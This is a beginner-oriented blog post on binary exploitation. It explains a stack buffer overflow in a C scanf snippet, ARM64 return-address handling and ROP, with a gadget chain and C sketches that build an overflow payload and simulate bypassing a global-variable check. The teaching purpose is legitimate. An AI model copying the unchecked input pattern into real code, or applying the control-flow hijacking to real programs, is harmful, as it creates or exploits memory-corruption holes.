Last year during lockdown I had a bunch of free time and while reading through an exploit trying to make sense of it I realised: the way this exploit works is a form of Art.
But then I started to think about it and realised that it doesn’t even need to be a complex exploit to say this.
Even the most basic buffer/heap overflow exploit is a form of Art.
So I decided to write this little post about it, but in the end I didn’t finish it and left it on my drive.
A few days ago I found it again and decided to finish it up and publish it, so I hope you will enjoy it.
Before I start this ‘blog post’, or whatever you would like to call it, I just want to note that this is my first time doing anything like this.
So if you find any errors please just DM me on Twitter (@tomitokics).
THE ART OF EXPLOITATION
If you are a developer who wants to get started in security, or you are just interested in computers, this post is probably for you, as I try my best to show how awesome binary exploitation can be while still keeping it simple.
Now I should mention that I am by no means someone who writes Phrack papers or comes up with ways around the newest mitigations.
However, I do have some experience in binary exploitation, and I want to cover the basics and explain why binary exploitation is so interesting to me.
For some people Art is found in museums, great classical music or… exploiting bugs.
Exploitation is truly an Art, and if you have ever written an exploit even for the most basic buffer overflow you will realise how true that statement is.
This is especially true on bigger targets, where there are multiple ways of exploiting the same bug.
If you give a bug to two people and the target is large enough, they might end up with completely different exploits (or techniques).
That’s because they see the bug differently: they would find a completely different way to reach the same bug, and they would use different gadgets.
It’s so awesome to look at exploit code and learn what it does and how it does it (or perhaps to write one on your own).
What was the person thinking? Do you see a better, faster way to reach and trigger the bug?
And when you start reversing the binary and looking into it, you will realise that the way exploits are crafted is an Art. They are carefully thought out, sometimes over-engineered because a high success rate is demanded, and they make the program do something its original creator never intended. All because someone accidentally forgot to check the length of an input from the user, they created this monster: the weird machine.
Hopefully, by now some of you can start to see my point (or at least think that there could be something in it, as I actually wrote a whole post about it).
I could go on and on saying it’s an Art and how awesome it is, but if I don’t show you some examples or the practical side of it, it’s all just words without the evidence a developer or newcomer would need.
So, let me demonstrate an exploit; a very basic one.
There are no exploits without bugs, so I will introduce you to the most basic bug everyone learns, no matter if you are a developer or an exploit developer: the stack buffer overflow.
As the name suggests, it is some sort of ‘overrun’.
Buffer overflows can happen on the heap as well as on the stack; in this particular case, as the name suggests, it is on the stack.
Now if you are familiar with C or C++ this might be easier, but don’t worry if you are not, I will guide you through it.
char buf[32]; // Here we allocate a char(acter) buffer of 32 bytes on the stack (note that you don't need to free/deallocate it, as the compiler sets it up for you when compiling your code)
scanf("%s", buf); // Here we wait for input from the user and copy that input into the buffer 'buf' we created earlier
printf("You entered : %s", buf); // This prints out what was copied into the buffer
Now can you spot the bug?
If you are a C or C++ developer, or even if you just paid close attention to the comments, you will probably spot that scanf copies bytes from our controlled input into a buffer allocated on the stack.
So in this case we have full control over the contents of the ‘buf’ buffer.
And since there is no check in the code above, we also control the length of our input.
And that’s a problem (well, in our case it’s good: no bug == no exploit).
So, what we know so far is that we control what’s inside ‘buf’ and, most importantly, the number of bytes that get copied.
As you can see the buffer is allocated as 32 bytes long.
Now think about what would happen if we entered more than 32 bytes (strictly speaking, 32 characters are already one too many, because scanf appends a terminating NUL byte).
You would trigger this bug.
This might not seem very interesting at first, and so far there aren’t many ways to exploit it, but this is just the beginning.
You have only triggered the bug, not exploited it. That is enough for POC||GTFO, but that’s not what we are aiming for.
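For contrast, here is a minimal sketch of the length check the snippet above is missing. The helper name `read_word` and the `BUF_SIZE` macro are made up for this post, and it parses a string with `sscanf` instead of reading stdin so it is easy to try out. The important part is the field width in the format string, which caps how many bytes get copied into the 32-byte buffer.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 32

/* Hypothetical helper: copies at most BUF_SIZE - 1 non-whitespace
 * characters from `input` into `out` (which must hold BUF_SIZE bytes)
 * and NUL-terminates it. Returns the number of characters stored. */
size_t read_word(const char *input, char out[BUF_SIZE])
{
    out[0] = '\0';
    /* "%31s" = at most BUF_SIZE - 1 characters, plus the NUL byte. */
    if (sscanf(input, "%31s", out) != 1)
        return 0;
    return strlen(out);
}
```

With plain scanf the same idea would be `scanf("%31s", buf)`: a 100 character input is simply cut off after 31 characters instead of running past the end of the buffer.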
BUFFER OVERFLOW EXPLOIT
Alright, so now we know that we can overflow the stack, but now what? Where is the ‘Art’ in this?
Slow down, patience is the key, especially if you want to be an exploit developer. (After all, debugging your exploits is fun, right? :P)
First, the questions we should ask are: what happens when we write too many bytes to the stack (more than 32 in this case), and what is the stack anyway?
The stack: you are probably familiar with it, but if not, let me introduce you to it very quickly.
The stack is a memory region created at runtime. It is where local variables live: when you create a variable inside a function, it can be stored on the stack. When performing a subroutine call you can also push arguments onto the stack so that the callee function can use them. Another important use of the stack comes into play when the called function finishes and wants to return to its caller. This works through the return pointer (the return address), which on ARM is held in the link register.
Ok, now we all have an idea of what the stack is, what we use it for and what’s on it.
As mentioned, we save arguments and local variables on the stack, but more importantly we also save the return pointer (on ARM, the value of the link register) on it.
I think you know where I’m going with this...
If we save the return pointer (where we should return to after a function call) on the stack and it gets overwritten, accidentally or maliciously, the callee function can no longer return to its caller because, well, we overwrote the address.
Now if we supply more than 32 bytes we will overwrite both the saved frame pointer and the saved link register.
This becomes a problem when we try to return to the caller function.
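To make that concrete without crashing anything, here is a small sketch that models the stack frame as a plain struct. The layout (buffer first, then the saved frame pointer, then the saved link register) and all the names are assumptions for illustration; on a real target the compiler decides the actual layout.

```c
#include <stdint.h>
#include <string.h>

/* Simplified model of a stack frame: the local buffer sits just below
 * the saved frame pointer (x29) and the saved link register (x30). */
struct fake_frame {
    char     buf[32];
    uint64_t saved_fp;
    uint64_t saved_lr;
};

/* Copies `len` bytes of input into the frame starting at buf, the way
 * an unchecked copy would. The length is clamped to the size of the
 * model so that the demo itself stays memory safe. */
void unchecked_copy(struct fake_frame *frame, const void *input, size_t len)
{
    if (len > sizeof(*frame))
        len = sizeof(*frame);
    memcpy(frame, input, len);
}
```

With 32 bytes of input the saved values survive. With 48 bytes of 'A' both saved_fp and saved_lr become 0x4141414141414141, and that is the value the function would later try to return to.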
ARM64 assembly functions usually start and end this way:
— Prologue —
SUB SP, SP, #0x20 => allocate space on the stack
STP x29, x30, [SP,#0x10] => save frame pointer and link register on the stack
— Body —
— Epilogue —
LDP x29, x30, [SP,#0x10] => restore register pair (FP & LR) from the stack
ADD SP, SP, #0x20 => readjust the stack
RET => ARM64 instruction for returning; under the hood it behaves like a ‘BR LR’ (branch to link register) instruction.
Now with a better understanding of control flow you can see that we return to the caller function by restoring the saved link register from the stack and jumping to it.
With no pointer verification (such as PAC), the CPU will happily try to jump to the value held in LR, even if it’s not the value that is supposed to be in it.
(Obviously, if it’s an invalid pointer such as 0x414141, the program will raise an exception and crash.)
The fun part: ROP
Now with this knowledge we can see what we need to do in order to control the Program Counter register (this is the register which points to the place in memory the CPU should fetch the next instruction from).
If we manage to write more than 32 bytes to the stack we can control the saved frame pointer and, more importantly, the saved link register. With this, however, a question arises: what should we overwrite those pointers with in order to continue execution?
Well, in the earlier shellcode days you could’ve just overwritten the LR with the address of shellcode placed on the stack; nowadays you can’t really do that because the stack is not executable.
Instead we overwrite the pointers with valid addresses from the code segment, and we call the code at these addresses gadgets, or ROP gadgets.
ROP stands for Return Oriented Programming, which, if you think about it for a second, makes a lot more sense now, since we actually return to the gadgets (with the BR LR instruction).
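As a rough sketch, the input for such an overwrite could be put together like this. The 32 bytes of padding match the buffer from earlier, but the exact offsets, the helper names and the addresses are assumptions for illustration; on a real target you would work the offsets out in a debugger.

```c
#include <stdint.h>
#include <string.h>

#define PADDING_LEN 32                      /* size of the target buffer */
#define PAYLOAD_LEN (PADDING_LEN + 8 + 8)   /* padding + saved FP + saved LR */

/* Writes a 64-bit value in little-endian byte order, which is how a
 * little-endian ARM64 system keeps it in memory. */
static void put_le64(unsigned char *dst, uint64_t value)
{
    for (int i = 0; i < 8; i++)
        dst[i] = (unsigned char)(value >> (8 * i));
}

/* Hypothetical helper: fills `out` (PAYLOAD_LEN bytes) with filler
 * bytes, a fake frame pointer and the address we want to land in LR. */
void build_payload(unsigned char out[PAYLOAD_LEN],
                   uint64_t fake_fp, uint64_t gadget_addr)
{
    memset(out, 'A', PADDING_LEN);                  /* fills the buffer   */
    put_le64(out + PADDING_LEN, fake_fp);           /* lands on saved FP  */
    put_le64(out + PADDING_LEN + 8, gadget_addr);   /* lands on saved LR  */
}
```

The first 32 bytes only exist to reach the saved registers; the last 8 bytes are the interesting ones, because that is where the first gadget address goes.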
A sensible question now could be: Why would I want to return to a different function? What’s the point?
Well, we don’t return to just any random function. We carefully select these functions based on the instructions found in their body. With these gadgets we can defeat security mechanisms, checks, etc. We can quite literally make a whole new ‘program’ out of the original if the binary is large enough.
To illustrate it think of something like this:
STR X0, [X1] => Let’s say we control both X0 and X1 (this instruction is *X1_pointer = X0_value)
MOV SP, X1 => Since we control X1 we will control the stack pointer as well
LDP X29, X30, [SP,#0x10] => load the FP and the LR from the stack (this would be from a new ‘fake’ stack, since we now control where the stack is. This would be a crucial gadget if we were working with heap bugs, but let’s not get into that now)
ADD SP, SP, #0x20 => Adjust the stack
RET => BR LR (again the link register is under our control, so we can specify another gadget address)
As you can see, with that gadget our control of X1 gives us a memory write and control of the stack pointer.
To demonstrate how powerful ROP is and how this is a “full blown programming language”, let’s try to bypass a check which simply tests the value of a global variable. (The variable lives in the data segment, which is readable and writable but not executable, unlike the code or text segment, which is readable and executable but not writable.)
(Let’s call this function ‘secret’, since even if we could call it normally it would fail, as ‘_check’ is hardcoded to zero.)
adrp x8, #___stack_chk_fail_ptr(0x10000c000) => address of page (locates the page near the address of the variable)
add x8, x8, #0x50 (0x10000c000 + 0x50 = 0x10000c050) => adjust the offset to the actual variable ‘_check’
ldr w9, [x8] => load the value of ‘_check’ into W9 (note the ‘w’, which means the lower 32 bits of the X9 register)
cbz w9, _fail => compare W9 with zero; if it is zero, jump to ‘_fail’, which exits the process with the value zero
movz w8, #0x0 => move zero into W8
mov x0, x8 => move X8 into X0 (X0 is used for the first argument and for the return value on ARM)
bl __exit => call exit(0) which exits the process
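In C, the check above might come from something like the following. This is my guess at what the source could look like, reconstructed from the disassembly, not the original code. The names and the return values are assumptions, and it returns instead of calling exit so that it can be tried out safely.

```c
#include <stdint.h>

/* Global variable in the data segment, hardcoded to zero.
 * It is volatile only so that the compiler keeps the load. */
static volatile uint32_t check = 0;

/* Returns 0 on the `_fail` path (where the original exits the process)
 * and 1 once the check passes. */
int secret(void)
{
    if (check == 0)    /* ldr w9, [x8] ; cbz w9, _fail */
        return 0;
    return 1;          /* the actual 'secret' part would run here */
}
```

Called normally this always takes the fail path, which is exactly why we need a way to write to the variable first.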
If we could load an arbitrary number (such as 1111) into X0, and the address of the global variable ‘_check’ into X1, we could bypass that check with a similar gadget!
There is literally no limit on how many gadgets you can jump to, or better said: how many we can chain together.
Now a gadget that could load the correct values into the desired registers would look something like this:
(Call this the ‘setup gadget’, as it sets up the registers for future gadgets)
ldp x0, x1, [sp, #0x10] => load whatever value is at SP+0x10 into x0, and whatever value is at SP+0x18 into x1
ldp x29, x30, [sp, #0x30] => restore FP, LR
add sp, sp, #0x40 => adjust the SP back
ret => BR LR (we can now jump to a gadget similar to the one shown above, but let’s say without the ‘fake stack’ part, since X1 would hold the address of ‘_check’)
(We can then call this the ‘write gadget’ due to what it does)
str x0, [x1] => *x1_pointer = x0_value | store whatever value is in x0 (now 1111, since we branched to the ‘setup gadget’ before) to the address in x1 (the address of the ‘_check’ variable)
ldp x29, x30, [sp, #0x10] => restore FP & LR from the stack
add sp, sp, #0x20 => adjust the stack pointer back
ret => return, using the ‘BR LR’ (can now jump to ‘secret’)
After the write gadget the _check variable should now hold the value ‘1111’.
And now we can call the original ‘secret’ function and we will pass the check as the variable was changed.
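If you want to play with the chain without a real target, here is a toy model of it. It is a sketch under heavy assumptions: the "machine" is a struct, the stack and the data segment are small arrays, and the gadget addresses are made-up numbers. Only the stack offsets are taken from the setup gadget and the write gadget above; the frame pointer is not modelled.

```c
#include <stdint.h>
#include <string.h>

#define STACK_SLOTS 16   /* fake stack, in 8-byte slots */
#define DATA_SLOTS  4    /* fake data segment */
#define CHECK_ADDR  2    /* made-up "address" of _check inside data[] */

/* Made-up "code addresses" for the two gadgets and the target. */
enum { SETUP_GADGET = 0x1000, WRITE_GADGET = 0x2000, SECRET = 0x3000 };

struct machine {
    uint64_t x0, x1, lr;
    size_t   sp;                      /* stack pointer as a slot index */
    uint64_t stack[STACK_SLOTS];
    uint64_t data[DATA_SLOTS];
};

/* Lays out the fake stack the way the two gadgets expect it. */
void build_chain(struct machine *m)
{
    memset(m, 0, sizeof(*m));
    m->stack[2]  = 1111;           /* [sp+0x10] -> x0 in the setup gadget */
    m->stack[3]  = CHECK_ADDR;     /* [sp+0x18] -> x1 in the setup gadget */
    m->stack[7]  = WRITE_GADGET;   /* [sp+0x38] -> LR after setup gadget  */
    m->stack[11] = SECRET;         /* 0x40 + 0x18 -> LR after write gadget */
}

/* Follows LR from gadget to gadget. Returns 1 if 'secret' passes its
 * check, 0 if it fails, -1 on a "crash" (bad address or runaway chain). */
int run_chain(struct machine *m, uint64_t entry)
{
    m->lr = entry;
    for (int steps = 0; steps < 8; steps++) {
        switch (m->lr) {                         /* ret == branch to LR */
        case SETUP_GADGET:
            if (m->sp + 8 > STACK_SLOTS) return -1;
            m->x0 = m->stack[m->sp + 2];         /* ldp x0, x1, [sp, #0x10] */
            m->x1 = m->stack[m->sp + 3];
            m->lr = m->stack[m->sp + 7];         /* ldp x29, x30, [sp, #0x30] */
            m->sp += 8;                          /* add sp, sp, #0x40 */
            break;
        case WRITE_GADGET:
            if (m->sp + 4 > STACK_SLOTS || m->x1 >= DATA_SLOTS) return -1;
            m->data[m->x1] = m->x0;              /* str x0, [x1] */
            m->lr = m->stack[m->sp + 3];         /* ldp x29, x30, [sp, #0x10] */
            m->sp += 4;                          /* add sp, sp, #0x20 */
            break;
        case SECRET:
            return m->data[CHECK_ADDR] != 0;     /* cbz w9, _fail */
        default:
            return -1;                           /* invalid pointer */
        }
    }
    return -1;
}
```

Calling build_chain and then run_chain with SETUP_GADGET as the entry point walks setup gadget, write gadget and finally ‘secret’, which now passes. Jumping straight to SECRET on a zeroed machine fails the check, just like calling the function normally would.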
So yes, ROP is programming (that’s what the ‘P’ in ROP stands for), just in a “weird” way (check out LiveOverflow’s video about exploring weird machines).
You can achieve anything you could do in a high level language such as C if the binary is large enough. You just have to do it manually, piecing the code together gadget by gadget.
The example I’ve shown above is just a very simple introduction to ROP. If you decide (which I highly suggest) to dig deeper and write more complex exploits for more complex bugs and, eventually, systems, you will agree that indeed: exploitation is a form of Art! And it’s beautiful!
So this is the end of it. If I still didn’t manage to convince you that this is a form of Art, well, I’m sorry; I tried my best to keep it simple but at the same time show the beauty of it (perhaps give it another read, you might change your mind?).
This is a little suggestion
if(reader == developer || reader == wants_to_learn_bin_exploitation)
Just start, you might fail a few times but don’t let that discourage you. We all did and we all do.
A great starting point is CTFs, or simply challenges where you need to exploit a binary in a similar way to what was shown above (i.e. with ROP gadgets).
else if(reader == has_some_experience)
If you are already familiar with binary exploitation and feel confident, try exploring bigger targets such as browsers and kernels.
I myself am currently learning about kernel development/exploitation. Spoiler alert: it’s really FUN!
Sometimes it can be overwhelming but then I always try to look at the big picture to see how it makes sense, and this usually works for me.
Overall I really hope you enjoyed this little blog post, and I hope I’ve introduced you to the Art of exploitation if you were unfamiliar with it.
Feedback is always welcome, so don’t hesitate to contact me here or on Twitter.
Tomi Tokics — @tomitokics